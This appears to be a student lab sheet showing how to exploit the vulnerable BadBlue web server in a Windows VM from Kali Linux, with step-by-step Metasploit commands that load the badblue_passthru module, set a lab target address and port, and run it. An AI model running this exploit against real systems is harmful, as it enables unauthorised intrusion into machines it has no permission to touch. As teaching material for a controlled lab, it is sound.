Aim: Using Metasloit to exploit (Kali Linux)
Step 1: Open Badblue and set the port 8000
Note: Open cmd type ipconfig and if you are getting error then set environment varaible and change system variable path 
To C:\Windows\System32
Step 2: Start Badblue
Step 3: Go to Kali Linux operating system on VMware and open terminal
Step 4: Type the command in terminal.first change the password, for that type password as sdsm. then following commands
(A) service postgresql
(B) msfconsole
(C) Search badblue
(D) use Exploit/windows/http/badblue_passthru
(E) Set rhost 192.168.149.133 (enter host ip)
(F) Set rport 8000
(G) Run